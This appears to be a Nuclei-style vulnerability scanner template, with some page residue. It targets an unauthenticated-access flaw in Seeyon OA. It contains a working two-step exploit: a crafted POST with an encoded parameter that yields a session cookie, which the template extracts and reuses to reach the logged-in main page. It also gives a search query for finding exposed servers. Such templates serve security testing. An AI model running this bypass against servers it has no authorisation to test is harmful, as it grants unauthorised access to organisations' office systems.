54 lines
1.5 KiB
YAML
54 lines
1.5 KiB
YAML
id: seeyon-unauth
|
|
|
|
info:
|
|
name: Seeyon Unauthoried Access
|
|
author: pikpikcu
|
|
severity: high
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
|
|
- https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml
|
|
metadata:
|
|
verified: true
|
|
fofa-query: app="致远互联-OA"
|
|
tags: misconfig,seeyon,unauth
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /seeyon/thirdpartyController.do HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept-Encoding: deflate
|
|
|
|
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
|
|
|
|
- |
|
|
GET /seeyon/main.do HTTP/1.1
|
|
Host: {{Hostname}}
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
Accept-Encoding: deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: {{session}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: session
|
|
part: header
|
|
internal: true
|
|
regex:
|
|
- 'JSESSIONID=(.*)'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "当前已登录了一个用户,同一窗口中不能登录多个用户"
|
|
- "<a href='/seeyon/main.do?method=logout'"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|